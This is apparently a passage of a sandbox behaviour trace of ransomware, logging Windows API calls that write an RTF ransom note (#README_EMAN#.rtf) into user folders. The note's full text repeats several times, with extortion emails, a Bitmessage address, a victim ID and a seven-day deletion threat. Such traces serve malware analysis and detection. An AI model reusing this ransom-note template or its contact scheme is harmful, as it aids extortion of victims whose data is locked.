server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x2364cd8, cbMultiByte=8717, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd p\\f1\\lang1049\\'e0\\f0\\lang1033 ssw\\f1\\lang1049\\'ee\\f0\\lang1033 rd.\\par\r\n2. \\f1\\lang1049\\'d3\\'ee\\f0\\lang1033 u must c\\f1\\lang1049\\'ee\\f0\\lang1033 nfirm th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n, r\\f1\\lang1049\\'e5\\f0\\lang1033 turn t\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd f\\f1\\lang1049\\'ee\\f0\\lang1033 ll\\f1\\lang1049\\'ee\\f0\\lang1033 w th\\f1\\lang1049\\'e5\\f0\\lang1033 instructi\\f1\\lang1049\\'ee\\f0\\lang1033 ns th\\f1\\lang1049\\'e0\\f0\\lang1033 t w\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nt t\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u.\\par\r\n3. R\\f1\\lang1049\\'e5\\f0\\lang1033 turn t\\f1\\lang1049\\'ee\\f0\\lang1033 sit\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 nd \\f1\\lang1049\\'f1\\f0\\lang1033 lick \\f1\\lang1049 \"\\f0\\lang1033 L\\f1\\lang1049\\'ee\\f0\\lang1033 gin\\f1\\lang1049 \"\\f0\\lang1033 l\\f1\\lang1049\\'e0\\f0\\lang1033 b\\f1\\lang1049\\'e5\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 r us\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_in }}{\\fldrslt{https://bitmsg.me/users/sign_in\\ul0\\cf0}}}}\\f0\\fs20 , \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd p\\f1\\lang1049\\'e0\\f0\\lang1033 ssw\\f1\\lang1049\\'ee\\f0\\lang1033 rd \\f1\\lang1049\\'e0\\f0\\lang1033 nd click th\\f1\\lang1049\\'e5\\f0\\lang1033 \"Sign in\" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n. \\f1\\lang1049 \\f0\\lang1033\\par\r\n4. \\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"\\f1\\lang1049\\'d1\\f0\\lang1033 r\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 t\\f1\\lang1049\\'e5\\f0\\lang1033 R\\f1\\lang1049\\'e0\\f0\\lang1033 nd\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 ddr\\f1\\lang1049\\'e5\\f0\\lang1033 ss\" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\par\r\n5. \\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"N\\f1\\lang1049\\'e5\\f0\\lang1033 w m\\f1\\lang1049\\'e0\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 \" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\par\r\n\\b 6. S\\f1\\lang1049\\'e5\\f0\\lang1033 nding m\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 :\\par\r\nT\\f1\\lang1049\\'ee\\f0\\lang1033 :\\b0 \\f1\\lang1049\\'c5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'e0\\f0\\lang1033 ddr\\f1\\lang1049\\'e5\\f0\\lang1033 ss: \\b BM-2cXRWRW5Jv5hxbhgu2HJSJrtPf92iKshhm\\par\r\n\r\n\\pard\\sl240\\slmult1 Subj\\f1\\lang1049\\'e5\\'f1\\f0\\lang1033 t:\\b0 \\f1\\lang1049\\'c5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur ID: \\b 460F9943EA70F103\\par\r\nM\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 : \\b0 D\\f1\\lang1049\\'e5\\f0\\lang1033 scrib\\f1\\lang1049\\'e5\\f0\\lang1033 wh\\f1\\lang1049\\'e0\\f0\\lang1033 t \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u think n\\f1\\lang1049\\'e5\\f0\\lang1033 c\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 r\\f1\\lang1049\\'f3\\f0\\lang1033 .\\par\r\n\r\n\\pard\\ri-74\\sa200\\sl240\\slmult1\\tx8378\\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"S\\f1\\lang1049\\'e5\\f0\\lang1033 nd m\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 \" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\cf5\\b\\par\r\n\r\n\\pard\\sa200\\sl240\\slmult1\\fs28 GCMD9HhH\\cf0\\f1\\fs32\\lang1049\\par\r\n\\par\r\n}\r\n\x06H\x06*\x06'\x06 ", lpUsedDefaultChar=0x0) returned 8717 [0291.193] WriteFile (in: hFile=0x2ec, lpBuffer=0x2364cd8*, nNumberOfBytesToWrite=0x220d, lpNumberOfBytesWritten=0x374fdb4, lpOverlapped=0x0 | out: lpBuffer=0x2364cd8*, lpNumberOfBytesWritten=0x374fdb4*=0x220d, lpOverlapped=0x0) returned 1 [0291.194] CloseHandle (hObject=0x2ec) returned 1 [0291.194] GetFileAttributesW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\pt_PT\\#README_EMAN#.rtf" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\pt_pt\\#readme_eman#.rtf")) returned 0xffffffff [0291.194] GetLastError () returned 0x2 [0291.194] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\pt_PT\\#README_EMAN#.rtf" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\pt_pt\\#readme_eman#.rtf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x2ec [0291.195] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8717 [0291.195] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 